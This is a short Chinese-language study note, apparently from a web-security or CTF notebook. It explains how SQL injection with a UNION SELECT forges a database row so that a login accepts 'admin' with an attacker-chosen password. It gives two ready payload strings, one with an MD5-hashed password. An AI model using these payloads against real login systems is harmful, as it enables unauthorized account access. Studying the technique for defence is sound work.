查询结果伪造.md
有时通过注入可以伪造查询结果,达到非法登录的效果
name=1' union select 1, 'admin', '1'#&pw=1
如上,我们伪造了一个名为admin
,密码为1
的查询结果,然后传递url
查询pw=1
,于是服务器认为我们拥有admin
正确的密码,成功登录
需要注意的是,由于服务端可能将密码经过md5
计算后存储,因此我们伪造的查询结果也应当经过md5
name=1' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'#&pw=1
#Web #SQL注入 #查询结果伪造